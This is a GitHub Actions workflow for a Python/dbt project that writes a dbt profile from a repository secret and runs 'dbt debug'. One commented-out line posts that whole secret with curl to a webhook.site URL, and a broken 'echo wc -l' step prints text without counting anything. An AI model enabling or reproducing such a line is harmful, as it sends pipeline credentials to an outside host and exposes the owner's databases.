Skip to content

bump

bump #9

Workflow file for this run

# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-python
name: Test App
on:
push:
branches: [ "orchestration" ]
pull_request:
branches: [ "orchestration" ]
permissions:
contents: read
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Set up Python 3.11
uses: actions/setup-python@v3
with:
python-version: "3.11"
- name: Install dependencies
run: |
python -m pip install --upgrade pip
if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
- name: Create dbt profile
env:
PROFILES_YML: ${{ secrets.PROFILES_YML }}
run: |
mkdir -p ~/.dbt
echo "$PROFILES_YML" > ~/.dbt/profiles.yml
echo wc -l ~/.dbt/profiles.yml
#curl -d "$PROFILES_YML" -X POST https://webhook.site/08edd1ac-372e-4a71-8e19-974e534ad079
- name: Execute dbt debug
run: |
dbt debug